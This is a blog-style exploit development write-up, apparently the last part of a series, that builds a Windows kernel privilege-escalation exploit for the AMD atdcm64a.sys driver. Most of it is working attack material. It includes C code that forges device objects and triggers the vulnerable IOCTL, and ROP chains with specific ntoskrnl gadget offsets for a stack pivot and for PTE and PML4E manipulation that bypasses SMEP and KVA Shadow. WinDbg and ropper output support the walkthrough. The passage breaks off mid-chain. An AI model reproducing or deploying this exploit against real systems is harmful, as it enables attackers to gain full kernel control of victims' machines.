Exploiting AMD atdcm64a.sys arbitrary pointer dereference

In the previous part of the series we successfully confirmed the vulnerabilities we discovered in our target kernel driver by proving that we can leak the base address of ntoskrnl.exe and hijack the execution flow to an arbitrary location of our choice.

In this final part, we will craft a full exploit that allows us to enable all privileges on Windows.

Now that we’ve confirmed both vulnerabilities we can start crafting an exploit. The first step in this phase is to look for research papers or blog posts showing how to exploit this type of vulnerability. After googling a bit I found an interesting presentation showing how to exploit such a vulnerability, along with what seems to be the related exploit code.

The general idea of the research is the following:

Redirect the execution flow to a ROP gadget that performs stack pivoting. In short, stack pivoting means modifying the stack pointer (RSP) so that it points to a user-mode address X that we control.
Execute a ROP chain stored at address X that obtains LPE.
Restore execution.

The exploit shown here won’t work when HVCI is enabled.

Crafting the ROP chain

In order to retrieve gadgets from ntoskrnl.exe I’ve decided to use ropper. A very handy feature of ropper is being able to find specific gadgets based on a syntax similar to “regex”.

Let’s first look for our pivot gadget. We must find a gadget that loads into RSP a value that is below the maximum user-mode address and is a multiple of 8, meaning the last 3 bits of the address must be 0. Based on the research we are referencing, we can also use gadgets that load a value into ESP, because a write to ESP zeroes the upper 4 bytes of RSP:

$ python Ropper.py
(ropper)> file /mnt/c/DRIVERS/windows11_ntoskrnl.exe
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] File loaded.
(windows11_ntoskrnl.exe/PE/x86_64)> search mov rsp, %
[INFO] Searching for gadgets: mov rsp, %


[INFO] File: /mnt/c/DRIVERS/windows11_ntoskrnl.exe
0x00000001404126d8: mov rsp, qword ptr [rcx + 0x10]; jmp rdx;
[...]
0x00000001404200df: mov rsp, rbp; pop rbp; ret;


(windows11_ntoskrnl.exe/PE/x86_64)> search mov esp, %
[INFO] Searching for gadgets: mov esp, %


[INFO] File: /mnt/c/DRIVERS/windows11_ntoskrnl.exe
[...]
0x0000000140b3a980: mov esp, 0xf6000000; ret;
[...]
0x000000014040ac03: mov esp, ebx; ret;
[...]


(windows11_ntoskrnl.exe/PE/x86_64)>

We found two interesting gadgets. Recall that we can control the value of RBX so we control EBX. Let’s inspect the gadgets in WinDbg:

0: kd> uu nt+0x0b3a980
nt!MxCreatePfn+0x94:
fffff800`2653a980 c22041          ret     4120h
fffff800`2653a983 83c104          add     ecx,4
fffff800`2653a986 443bc9          cmp     r9d,ecx
fffff800`2653a989 72b6            jb      nt!MxCreatePfn+0x55 (fffff800`2653a941)
fffff800`2653a98b 89bb00010000    mov     dword ptr [rbx+100h],edi
fffff800`2653a991 443bce          cmp     r9d,esi
fffff800`2653a994 0f82ac620100    jb      nt!MiAssignTopLevelRanges+0x12a (fffff800`26550c46)
fffff800`2653a99a 488b6c2428      mov     rbp,qword ptr [rsp+28h]
0: kd> uu nt+0x040ac03
nt!SymCryptScsTableLoad128Xmm+0x187:
fffff800`25e0ac03 8be3            mov     esp,ebx
fffff800`25e0ac05 c3              ret
[...]
0: kd>

The first one, mov esp, 0xf6000000; ret;, does not match what WinDbg shows at that address in the running kernel (a ret 4120h), so we discard it. The second one matches what we see in WinDbg, so we choose it. We observed previously that rbx corresponds to object+0x30, so when allocating object we just need to call VirtualAlloc() with the address we want as the first parameter.

At this point you can overwrite the function pointer with our stack pivot gadget, set the breakpoints, re-launch the exploit and notice how RSP changes. Below is the modified arbitraryCallDriver() function.

For the moment the shellcode can be a dummy made of instructions such as NOPs (\x90) or whatever you want.

char shellcode[] = "\x48\x89[...]\xC3";

[...]
BOOL arbitraryCallDriver(PVOID outputBuffer, SIZE_T outSize) {
    char* inputBuffer = (char*)VirtualAlloc(
        NULL,
        21,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    char* object = (char*)VirtualAlloc(
        (LPVOID)(0x0000001afeffe000),
        0x12000,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
    printf("[+] object = 0x%p\n", object);
    object = (char*)(0x1aff000000 - 0x30);
    printf("[+] second object = 0x%p\n", object);

    PDEVICE_OBJECT ptr = (PDEVICE_OBJECT)(object + 0x30);

    memset(object, 0x41, 0x30);

    printf("[+] ptr = 0x%p\n", ptr);
    char* object2 = (char*)VirtualAlloc(
        NULL,
        SIZE_BUF,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    printf("[+] object2 = 0x%p\n", object2); //0x0000001af5ff0000
    memset(object2, 0x43, 0x30);

    char* driverObject = (char*)VirtualAlloc(
        NULL,
        SIZE_BUF,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    memset(driverObject, 0x50, SIZE_BUF);
    printf("[+] driverObject = 0x%p\n", driverObject);
    char* ptrDriver = driverObject + 0x30;
    char* pDriverFunction = ptrDriver + 0x1b*8+0x70;

    *((PDWORD64)pDriverFunction) = g_ntbase+ 0x40ac03;   //mov esp, ebx; ret

    ptr->AttachedDevice = (PDEVICE_OBJECT)(object2 + 0x30);

    
    memset(ptr->AttachedDevice, 0x42, SIZE_BUF-0x40);
    //*((DWORD*)ptr->AttachedDevice) = 0xf6000000;

    printf("[+] ptr->AttachedDevice = 0x%p\n", ptr->AttachedDevice);
    
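    // MEM_RESERVE rounds the requested base down to the allocation granularity
    // (normally 64 KB), so the returned base is expected to be 0xfeff0000.
    PULONGLONG fake_stack = (PULONGLONG)VirtualAlloc((LPVOID)0x00000000feffe000, 0x12000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    
    if (fake_stack == NULL) {
        printf("[-] VirtualAlloc failed with error: %lu\n", GetLastError());
        exit(1);
    }
    printf("[*] fake_stack = 0x%p\n", fake_stack);

    // 0x2000 ULONGLONG slots = 0x10000 bytes past the base, i.e. 0xff000000
    PULONGLONG ropStack = (PULONGLONG)fake_stack + 0x2000;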

    memset(fake_stack, 0x41, 0x12000);
    
    printf("[*] ropStack = 0x%p\n", ropStack);
    DWORD index = 0;

    char* scbase = (char*)VirtualAlloc((LPVOID)0x1a1a1a000000, 0x5000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (scbase == NULL || !VirtualLock(scbase, 0x5000)) {
        printf("[-] VirtualAlloc/VirtualLock failed with error: %lu\n", GetLastError());
        exit(1);
    }
    memset(scbase, 0x42, 0x5000);
    char* sc = scbase + 0x3500;
    memcpy(sc, shellcode, sizeof(shellcode));

    printf("[*] sc = 0x%p\n", sc);

    //TODO: beginning of rop chain at ropStack

#ifdef _DEBUG
    // Dump the ROP chain; index is a DWORD and each slot is a ULONGLONG
    for (DWORD i = 0; i < index; i++) {
        printf("ropStack[%lu] %p : 0x%llx\n", i, (void*)&ropStack[i], ropStack[i]);
    }
#endif
    ptr->AttachedDevice->DriverObject = (_DRIVER_OBJECT*)ptrDriver;
    ptr->AttachedDevice->AttachedDevice = 0;
    char* ptr2 = inputBuffer;
    *(ptr2) = 0;
    ptr2 += 1;
    *((PDWORD64)ptr2) = (DWORD64)ptr;
    

    printf("[+] User buffer allocated: 0x%8p\n", inputBuffer);

    DWORD bytesRet = 0;

    getchar();
    BOOL res = DeviceIoControl(
        g_device,
        IOCTL_ARBITRARYCALLDRIVER,
        inputBuffer,
        SIZE_BUF,
        outputBuffer,
        outSize,
        &bytesRet,
        NULL
    );

    printf("[*] sent IOCTL_ARBITRARYCALLDRIVER \n");
    if (!res) {
        printf("[-] DeviceIoControl failed with error: %lu\n", GetLastError());
    }
    return res;
}
[...]

The idea of the code above is to allocate object so that it points to address 0x0000001afeffffd0. This way our first rogue _DEVICE_OBJECT (ptr in the code) is located at address object+0x30 = 0x0000001aff000000.

When reaching the jmp rax instruction, RBX will contain the value 0x0000001aff000000, that is object+0x30. This means that when we execute our stack pivoting gadget mov esp, ebx; ret, RSP will be loaded with the value 0x00000000ff000000.

And in fact our ropStack variable points exactly at address 0x00000000ff000000. So we are left with filling the memory referenced by ropStack with a ROP chain that bypasses SMEP and finally redirects execution to our shellcode.
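The address arithmetic behind the pivot can be checked in plain C, without touching the driver. This is only a sketch: the function names are mine, and the 64 KB allocation granularity is an assumption (it is the usual value on Windows, and VirtualAlloc() rounds a reserved base address down to it).

```c
#include <assert.h>
#include <stdint.h>

/* Assumption: the usual 64 KB allocation granularity reported by GetSystemInfo(). */
#define ALLOC_GRANULARITY 0x10000ULL

/* VirtualAlloc() with MEM_RESERVE rounds the requested base down to the granularity. */
uint64_t round_down_to_granularity(uint64_t requested)
{
    return requested & ~(ALLOC_GRANULARITY - 1);
}

/* `mov esp, ebx` writes a 32-bit register, so the result is zero-extended into RSP. */
uint64_t rsp_after_pivot(uint64_t rbx)
{
    return (uint64_t)(uint32_t)rbx;
}

/* A pivoted stack pointer is usable only if it is non-null and 8-byte aligned. */
int is_usable_pivot_target(uint64_t rsp)
{
    assert(rsp <= UINT32_MAX); /* a 32-bit pivot can never produce more than this */
    return rsp != 0 && (rsp & 7) == 0;
}
```

With RBX = 0x0000001aff000000 the pivot yields 0xff000000, and a fake_stack base rounded down from 0xfeffe000 to 0xfeff0000 plus 0x2000 eight-byte slots lands on that same address.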

Here is a diagram that summarizes the different data structures in user-space memory along with their addresses:

Diagram of the structures allocated by arbitraryCallDriver()

First SMEP bypass ROP Chain

Now we can start crafting our ROP chain in order to bypass SMEP. Initially I crafted the following ROP chain (g_ntbase holds the base address of ntoskrnl.exe; recall that we can retrieve it by exploiting the arbitrary MSR read).

//<call MiGetPteAddress in order to get PTE. PTE address returned in rax>
ropStack[index] = g_ntbase + 0x2053e5; index++; // pop rcx; ret;
ropStack[index] = (ULONGLONG)(scbase+0x3000); index++;          // shellcode address pte
ropStack[index] = g_ntbase + 0x203beb; index++; // pop rax; ret;
ropStack[index] = g_ntbase + 0x2abae4; index++; //address of nt!MiGetPteAddress
ropStack[index] = g_ntbase + 0x2803b8; index++; // jmp rax;
// <call MiGetPteAddress in order to get PTE. PTE address returned in rax>


// <Flip U=S bit>  PTE VA already in rax
ropStack[index] = g_ntbase + 0x20FA62; index++; // pop rcx; ret;
ropStack[index] = 0x0000000000000063; index++;  // DIRTY + ACCESSED + R/W + PRESENT
ropStack[index] = g_ntbase + 0x4531f1; index++; // mov byte ptr[rax], cl; ret;
ropStack[index] = g_ntbase + 0x370050; index++; // wbinvd; ret;
// </Flip U=S bit>


// <shellcode>
ropStack[index] = (ULONGLONG)sc; index++;      // Shellcode address
// <shellcode>

The ROP chain above does the following:

Call nt!MiGetPteAddress, passing the address of the page that holds our shellcode (we will get to the shellcode itself later), in order to retrieve the address of the corresponding PTE, which is returned in RAX.
Overwrite the lowest byte of the PTE with 0x63: this sets the DIRTY, ACCESSED, R/W and PRESENT bits to 1 and the OWNER bit to 0.
Execute the wbinvd instruction, which writes back and invalidates the CPU caches, to make sure the modified PTE is actually taken into account.
Execute the shellcode.
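The first two steps boil down to a bit of arithmetic that can be reproduced in user mode. The sketch below assumes the PTE base seen in the WinDbg session of this post (0xFFFFFE8000000000, which is randomized per boot) and assumes the PTE held ...867 before the write, since only the value after the write is shown here. Function and macro names are mine.

```c
#include <assert.h>
#include <stdint.h>

/* Assumption: PTE base of the debugging session in this post; it changes at every boot. */
#define EXAMPLE_PTE_BASE 0xFFFFFE8000000000ULL

#define PTE_PRESENT  (1ULL << 0)
#define PTE_WRITE    (1ULL << 1)
#define PTE_USER     (1ULL << 2) /* the "owner" bit: 1 = user, 0 = supervisor */
#define PTE_ACCESSED (1ULL << 5)
#define PTE_DIRTY    (1ULL << 6)

/* Same arithmetic as nt!MiGetPteAddress: one 8-byte PTE for every 4 KB page. */
uint64_t pte_address(uint64_t va, uint64_t pte_base)
{
    return ((va >> 9) & 0x7FFFFFFFF8ULL) + pte_base;
}

/* Effect of `mov byte ptr [rax], cl`: only the lowest byte of the PTE changes. */
uint64_t write_low_byte(uint64_t pte, uint8_t value)
{
    assert((value & PTE_PRESENT) != 0); /* clearing PRESENT would unmap the page */
    return (pte & ~0xFFULL) | value;
}
```

For the shellcode at 0x00001a1a1a003500 this gives a PTE address of 0xFFFFFE8D0D0D0018, and writing 0x63 over a PTE ending in 0x67 clears only the owner bit.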

So now we can just recompile the exploit, set a breakpoint at the first gadget of our ROP chain and launch it (at this point I think it’s unnecessary to use the IDA Pro Debugger so I suggest switching to WinDbg). You can see the breakpoint gets hit:

0: kd> ba e 1 nt+0x2053e5
0: kd> g
Breakpoint 0 hit
nt!KeRemoveQueueDpcEx+0x125:
fffff800`25c053e5 59              pop     rcx
0: kd> r
rax=fffff80025e0ac03 rbx=0000001aff000000 rcx=000001f6a94d0030
rdx=ffffe18f37ad8000 rsi=ffffe18f365aa00d rdi=000001f6a94d0030
rip=fffff80025c053e5 rsp=00000000ff000008 rbp=0000000000000000
 r8=000000000000001b  r9=000001f6a94d0030 r10=fffff80025e0ac03
r11=0000000000000000 r12=0000000000000004 r13=ffffe18f35dfa4c0
r14=ffffe18f35dfa3f0 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040246
nt!KeRemoveQueueDpcEx+0x125:
fffff800`25c053e5 59              pop     rcx
0: kd> p
KDTARGET: Refreshing KD connection


*** Fatal System Error: 0x0000000a
                       (0x00000000FEFFF319,0x00000000000000FF,0x00000000000000F6,0xFFFFF80025E18BE0)


[...]
0: kd> !analyze -v
[...]


IRQL_NOT_LESS_OR_EQUAL (a)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high.  This is usually
caused by drivers using improper addresses.
If a kernel debugger is available get the stack backtrace.
Arguments:
Arg1: 00000000fefff319, memory referenced
Arg2: 00000000000000ff, IRQL
Arg3: 00000000000000f6, bitfield :
    bit 0 : value 0 = read operation, 1 = write operation
    bit 3 : value 0 = not an execute operation, 1 = execute operation (only on chips which support this level of status)
Arg4: fffff80025e18be0, address which referenced memory


Debugging Details:
------------------


[...]


BUGCHECK_CODE:  a


BUGCHECK_P1: fefff319


BUGCHECK_P2: ff


BUGCHECK_P3: f6


BUGCHECK_P4: fffff80025e18be0


[...]
A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.


A fatal system error has occurred.


0: kd> k
 # Child-SP          RetAddr               Call Site
00 fffff800`28a944c8 fffff800`25f668e2     nt!DbgBreakPointWithStatus
01 fffff800`28a944d0 fffff800`25f65fa3     nt!KiBugCheckDebugBreak+0x12
02 fffff800`28a94530 fffff800`25e16c07     nt!KeBugCheck2+0xba3
03 fffff800`28a94ca0 fffff800`25e2c4e9     nt!KeBugCheckEx+0x107
04 fffff800`28a94ce0 fffff800`25e27a34     nt!KiBugCheckDispatch+0x69
05 fffff800`28a94e20 fffff800`25e18be0     nt!KiPageFault+0x474
06 fffff800`28a94fb0 fffff800`25e19567     nt!KiInterruptSubDispatchNoLockNoEtw+0x20
07 00000000`fefff2f0 fffff800`25d1375f     nt!KiInterruptDispatchNoLockNoEtw+0x37
08 00000000`fefff480 fffff800`264ae2a6     nt!KeThawExecution+0xef
09 00000000`fefff4b0 fffff800`25d0b38a     nt!KdExitDebugger+0xc2
0a 00000000`fefff4e0 fffff800`264ae117     nt!KdpReport+0x136
0b 00000000`fefff520 fffff800`25d0a93e     nt!KdpTrap+0x37
0c 00000000`fefff570 fffff800`25d0981f     nt!KdTrap+0x22
0d 00000000`fefff5b0 fffff800`25e2c63c     nt!KiDispatchException+0x19f
0e 00000000`fefffc90 fffff800`25e24423     nt!KiExceptionDispatch+0x13c
0f 00000000`fefffe70 fffff800`25c053e5     nt!KxDebugTrapOrFault+0x423
10 00000000`ff000008 fffff800`25c03beb     nt!KeRemoveQueueDpcEx+0x125
11 00000000`ff000018 00001a1a`1a003500     nt!CmSiMapViewOfSection+0x57
12 00000000`ff000078 41414141`41414141     0x00001a1a`1a003500
13 00000000`ff000080 41414141`41414141     0x41414141`41414141
14 00000000`ff000088 41414141`41414141     0x41414141`41414141
15 00000000`ff000090 41414141`41414141     0x41414141`41414141
[...]

You can see the error happened when trying to access memory at address 0x00000000fefff319, close to our ropStack. I thought it might be due to a page fault (as WinDbg reports), so I tried modifying the code as follows:

[...]
if (!VirtualLock((char*)ropStack - 0x3000, 0x10000)) {
    printf("[-] VirtualLock failed with error: %lu\n", GetLastError());
    exit(1);
}
[...]

The idea is to call VirtualLock() on the pages containing our ROP chain and also on the adjacent pages. According to MSDN, this Win32 API locks the pages in physical memory and should therefore avoid page faults. However, this didn’t solve the issue.

On the other hand, while analyzing the stack trace I noticed a couple of functions such as nt!KdTrap and nt!KdExitDebugger. So I thought the issue might be caused by stepping with the debugger. In fact, if you set a breakpoint on, for example, the fifth ROP gadget, you will notice the breakpoint gets hit, confirming the ROP gadgets are actually executed successfully!

So, it looks like we just can’t debug our ROP chain but we can execute it 😅

If we set a breakpoint directly on the first instruction of our shellcode, we can see it gets hit. At this point we can also notice that the owner bit of the shellcode’s PTE is set to 0 (supervisor mode), confirming the ROP chain was successful:

0: kd> !process 0 0 DrvExpTemplate.exe
PROCESS ffffe18f36e9e0c0
    SessionId: 1  Cid: 06f0    Peb: ae8969f000  ParentCid: 0720
    DirBase: 119fd2002  ObjectTable: ffff9602fa50b4c0  HandleCount:  51.
    Image: DrvExpTemplate.exe


0: kd> .process /r /p /i ffffe18f36e9e0c0
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff800`25e20ca0 cc              int     3
1: kd> dx @$curprocess.Name
@$curprocess.Name : DrvExpTemplate.exe
    Length           : 0x12
1: kd> ba e 1 0x00001a1a1a003500
1: kd> g
... Retry sending the same data packet for 64 times.
The transport connection between host kernel debugger and target Windows seems lost.
please try resync with target, recycle the host debugger, or reboot the target Windows.
Breakpoint 0 hit
00001a1a`1a003500 4889c2          mov     rdx,rax
0: kd> !pte 0x00001a1a1a003500
                                           VA 00001a1a1a003500
PXE at FFFFFEFF7FBFD1A0    PPE at FFFFFEFF7FA34340    PDE at FFFFFEFF46868680    PTE at FFFFFE8D0D0D0018
contains 8A00000222774867  contains 0A00000129075867  contains 0A000001BBD76867  contains 08000001BCC7A863
pfn 222774    ---DA--UW-V  pfn 129075    ---DA--UWEV  pfn 1bbd76    ---DA--UWEV  pfn 1bcc7a    ---DA--KWEV

Now, let’s try to set a breakpoint at the second instruction in the shellcode and see if we hit it:

0: kd> !process 0 0 DrvExpTemplate.exe
PROCESS ffffe18f3578e0c0
    SessionId: 1  Cid: 0c08    Peb: ede7a83000  ParentCid: 0720
    DirBase: 1b7fd5002  ObjectTable: ffff9602ff106c40  HandleCount:  51.
    Image: DrvExpTemplate.exe


0: kd> .process /r /i /p ffffe18f3578e0c0
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff800`25e20ca0 cc              int     3
1: kd> dx @$curprocess.Name
@$curprocess.Name : DrvExpTemplate.exe
    Length           : 0x12
1: kd> uu 00001a1a`1a003500 L3
00001a1a`1a003500 4889c2          mov     rdx,rax
00001a1a`1a003503 488b08          mov     rcx,qword ptr [rax]
00001a1a`1a003506 480fbae902      bts     rcx,2
1: kd> ba e 1 00001a1a`1a003503
1: kd>

We launch the exploit again and the VM just restarts.

Kernel Virtual Address Shadow

The issue with our SMEP bypass strategy is that it only suits versions of Windows 10 released before March 2018. After that, Microsoft introduced Kernel Virtual Address Shadow (KVA Shadow), a mitigation for the Meltdown vulnerability that also has the side effect of preventing user-mode code from being executed in kernel mode.

This article was definitely helpful in understanding Kernel Virtual Address Shadow and how to bypass it.

Referring to the article, it is possible to detect whether KVA Shadow is enabled by checking the PML4 entry (PML4E) of our shellcode’s address. In fact, we already did it in WinDbg:

0: kd> !pte 0x00001a1a1a003500
                                           VA 00001a1a1a003500
PXE at FFFFFEFF7FBFD1A0    PPE at FFFFFEFF7FA34340    PDE at FFFFFEFF46868680    PTE at FFFFFE8D0D0D0018
contains 8A00000222774867  contains 0A00000129075867  contains 0A000001BBD76867  contains 08000001BCC7A863
pfn 222774    ---DA--UW-V  pfn 129075    ---DA--UWEV  pfn 1bbd76    ---DA--UWEV  pfn 1bcc7a    ---DA--KWEV

We can see that the flags of our PML4 entry (known as PX entry or PXE in Windows) are ---DA--UW-V. So it’s not executable (the E flag doesn’t appear in WinDbg), as explained in the article.

According to the article, the strategy for bypassing KVA and SMEP is the following:

Retrieve the PML4E’s address.
Clear the bit at index 63 (NX bit) and the bit at index 2 (Owner bit) of the PML4E, in order to make the PML4E both executable and owned by supervisor (on x64, a PML4E is a 64-bit value with bit indexes going from 0 to 63).
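To make the two bit operations concrete, here is a small sketch that checks a PML4E for the pattern described above and computes the patched value. It uses the PXE value from the WinDbg output (0x8A00000222774867); the function names are mine and not taken from the referenced article.

```c
#include <assert.h>
#include <stdint.h>

#define ENTRY_PRESENT (1ULL << 0)
#define ENTRY_USER    (1ULL << 2)  /* owner bit: 1 = user, 0 = supervisor */
#define ENTRY_NX      (1ULL << 63) /* no-execute bit */

/* Returns 1 when the entry is user-owned and non-executable, as seen with KVA Shadow. */
int blocks_kernel_execution(uint64_t pml4e)
{
    assert((pml4e & ENTRY_PRESENT) != 0); /* only meaningful for a valid entry */
    return (pml4e & ENTRY_NX) != 0 && (pml4e & ENTRY_USER) != 0;
}

/* Clears NX (bit 63) and the owner bit (bit 2), leaving everything else untouched. */
uint64_t make_supervisor_executable(uint64_t pml4e)
{
    return pml4e & ~(ENTRY_NX | ENTRY_USER);
}
```

Applied to 0x8A00000222774867 the result is 0x0A00000222774863: the page frame number and the remaining flags are unchanged.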

A note on SMEP bypass using the CR4 register technique

At this point it would probably be easier to disable SMEP with the well-known technique that clears the bit at index 20 of the CR4 register.

However, I didn’t like the idea of possibly triggering PatchGuard. In addition, using ropper I couldn’t find “nice gadgets” that allow modifying the CR4 register.

Here’s the output of ropper looking for gadgets that save the CR4 register in another one:

(windows11_ntoskrnl.exe/PE/x86_64)> search % %, cr4
[INFO] Searching for gadgets: % %, cr4

[INFO] File: /mnt/c/DRIVERS/windows11_ntoskrnl.exe
0x0000000140b14519: add dword ptr [rbp - 0xf], esi; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;
0x0000000140b1451a: jne 0xb1450d; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;
0x000000014042815d: mov r9, cr4; mov r8, cr0; mov ecx, 0x7f; call 0x42c480; nop; ret;
0x0000000140b1451c: mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;
0x000000014042815e: mov rcx, cr4; mov r8, cr0; mov ecx, 0x7f; call 0x42c480; nop; ret;
0x0000000140b14517: sub eax, 1; jne 0xb1450d; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;
0x0000000140b14516: sub r8, 1; jne 0xb1450d; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;
0x0000000140b1451b: int1; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;

(windows11_ntoskrnl.exe/PE/x86_64)> search % cr4
[INFO] Searching for gadgets: % cr4

[...]
0x0000000140b1451b: int1; mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;

(windows11_ntoskrnl.exe/PE/x86_64)>

As you can see, some gadgets are followed by a call to a fixed location (which I would rather avoid).

The most promising gadget in my opinion was 0x0000000140b1451c: mov rax, cr4; or rax, 0x40; mov cr4, rax; ret;. However, it ends up changing a bit of the CR4 register, which again may trigger PatchGuard or other unwelcome behavior.
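It is worth spelling out which bit that gadget touches. In the sketch below the bit names follow the Intel manuals (bit 6 is MCE, bit 20 is SMEP); the sample CR4 value used afterwards is hypothetical and only serves the arithmetic.

```c
#include <assert.h>
#include <stdint.h>

#define CR4_MCE  (1ULL << 6)  /* Machine-Check Enable */
#define CR4_SMEP (1ULL << 20) /* Supervisor Mode Execution Prevention */

/* Value written back by `mov rax, cr4; or rax, 0x40; mov cr4, rax`. */
uint64_t cr4_after_gadget(uint64_t cr4)
{
    return cr4 | 0x40;
}

/* Value a classic SMEP-disabling write would have to produce instead. */
uint64_t cr4_without_smep(uint64_t cr4)
{
    assert((cr4 >> 32) == 0); /* the upper 32 bits of CR4 are reserved */
    return cr4 & ~CR4_SMEP;
}
```

With a hypothetical CR4 of 0x3506f8, the gadget leaves bit 20 set, while clearing SMEP would give 0x2506f8. In other words, the gadget only sets bit 6 and cannot clear SMEP on its own.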

KVA/SMEP bypass ROP chain

The first thing to do in crafting this second ROP chain is retrieving the address of the PML4 entry.

Based on the article, the function for retrieving the PML4E address is CalculatePml4VirtualAddress(), and it requires two indexes:

pml4SelfRefIndex: calculated through ExtractPml4Index(), passing as input the pteAddress value stored at nt!MiGetPteAddress+0x13.
pml4Index: calculated again through ExtractPml4Index(), but passing as input the address of the shellcode.

The pml4Index can be easily calculated from user-mode, out of the ROP chain, as we already know the address of the shellcode:

[...]
unsigned int ExtractPml4Index(PVOID address)
{
    return ((uintptr_t)address >> 39) & 0x1ff;
}
[...]
BOOL arbitraryCallDriver(PVOID outputBuffer, SIZE_T outSize) {
[...]

    memset(scbase, 0x42, 0x5000);
    char* sc = scbase + 0x3500;
    memcpy(sc, shellcode, sizeof(shellcode));


    unsigned int pml4shellcode_index = ExtractPml4Index(sc);
    printf("[*] sc = 0x%p\n", sc);
    printf("[*] pml4shellcode_index 0x%x\n", pml4shellcode_index);

    //start of ROP chain
}

On the other hand, the pml4SelfRefIndex must be calculated inside our ROP chain, as we must start from the address at nt!MiGetPteAddress+0x13.

So first we read the address at nt!MiGetPteAddress+0x13 and store the result in rax:

//<get base from nt!MiGetPteAddress+0x13>
ropStack[index] = g_ntbase + 0x203beb; index++; // pop rax; ret;
ropStack[index] = g_ntbase + 0x2abaf7; index++; // address of nt!MiGetPteAddress+0x13
ropStack[index] = g_ntbase + 0x235aa6; index++; // mov rax, qword ptr [rax]; ret;
//<get base from nt!MiGetPteAddress+0x13>

Then we calculate the pml4SelfRefIndex from the address previously stored in rax. This is like re-implementing ExtractPml4Index() with ROP gadgets: we have to shift rax right by 39 and then AND it with the constant 0x1ff.

This is achieved with the ROP chain below, where we shift rax right by 0xc+0xc+0xc+3=0x27 (39 in decimal). The calculated pml4SelfRefIndex is finally moved from rax to rcx by writing rax into the stack slot that the following pop rcx consumes.

//<get pml4Index>
ropStack[index] = g_ntbase + 0x34bb9c; index++; // pop rdx; ret;
ropStack[index] = 0x1ff; index++; // 0x1ff
ropStack[index] = g_ntbase + 0x752664; index++;// shr rax, 0xc; ret;
ropStack[index] = g_ntbase + 0x752664; index++;// shr rax, 0xc; ret;
ropStack[index] = g_ntbase + 0x752664; index++;// shr rax, 0xc; ret;
ropStack[index] = g_ntbase + 0x38738b; index++;//shr rax, 3; ret;
ropStack[index] = g_ntbase + 0x358532; index++;// and rax, rdx; ret;
//<get pml4index> now pml4index in rax

//<move pml4index in rcx>
ropStack[index] = g_ntbase + 0x34bb9c; index++;// pop rdx; ret;
ropStack[index] = (ULONGLONG)&ropStack[index + 3]; index++;
ropStack[index] = g_ntbase + 0x35dbc9; index++; // mov qword ptr [rdx], rax; ret;
ropStack[index] = g_ntbase + 0x2053e5; index++; // pop rcx; ret;
ropStack[index] = 0x4141414141414141; index++;//dummy
//<mov pml4index in rcx>
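The two blocks above can be emulated in user mode to convince ourselves they do what we expect. This is only a sketch with names of my own: the first function replays the shift and mask gadgets, the second replays the rax to rcx move on a five-slot mock stack laid out like the chain (slot 4 is the dummy).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* ExtractPml4Index() rebuilt from the operations the gadgets provide. */
uint64_t self_ref_index_via_gadgets(uint64_t pte_base)
{
    uint64_t rax = pte_base;
    uint64_t rdx = 0x1ff; /* pop rdx; ret */
    rax >>= 0xc;          /* shr rax, 0xc; ret */
    rax >>= 0xc;          /* shr rax, 0xc; ret */
    rax >>= 0xc;          /* shr rax, 0xc; ret */
    rax >>= 3;            /* shr rax, 3; ret (39 bits in total) */
    rax &= rdx;           /* and rax, rdx; ret */
    return rax;
}

/* Replays: pop rdx; <&dummy>; mov [rdx], rax; pop rcx; <dummy>. */
uint64_t move_rax_to_rcx(uint64_t rax)
{
    uint64_t stack[5] = {0, 0, 0, 0, 0x4141414141414141ULL};
    size_t sp = 1;          /* slot 0 (pop rdx gadget) was consumed by the previous ret */
    uint64_t rdx, rcx;

    stack[1] = (uint64_t)(uintptr_t)&stack[4]; /* &ropStack[index + 3] in the chain */
    rdx = stack[sp++];                         /* pop rdx */
    sp++;                                      /* ret consumes slot 2 (mov gadget) */
    *(uint64_t *)(uintptr_t)rdx = rax;         /* mov qword ptr [rdx], rax */
    sp++;                                      /* ret consumes slot 3 (pop rcx gadget) */
    rcx = stack[sp++];                         /* pop rcx reads the overwritten dummy */
    assert(sp == 5);                           /* the whole mock chain was consumed */
    return rcx;
}
```

With the PTE base of this debugging session (0xFFFFFE8000000000) the first function returns 0x1FD, and the second one hands back whatever value was in rax.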

Now that we have both indexes we can implement the CalculatePml4VirtualAddress() in the ROP chain.

As we can see, the ROP chain below first loads the constant 0xffff in rax. After that it shifts rax left by 3 three times, which corresponds to a shift left by 9, and then ORs rax with the pml4SelfRefIndex stored in rcx. It repeats this four times, following the algorithm in the referenced article.

Finally, it performs one last shift left of rax by 0xc and ORs rax with pml4Index*8. At this point the address of the PML4E is in rax:

//<get pml4 address>
ropStack[index] = g_ntbase + 0x203beb; index++;// pop rax; ret;
ropStack[index] = 0xffff; index++;
//first round
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
